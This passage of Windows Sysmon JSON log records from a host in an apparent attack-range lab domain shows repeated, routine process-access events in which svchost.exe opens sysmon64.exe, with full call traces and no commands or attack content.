:"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5949,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5950,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5951,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5952,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5953,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5954,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5955,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5956,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
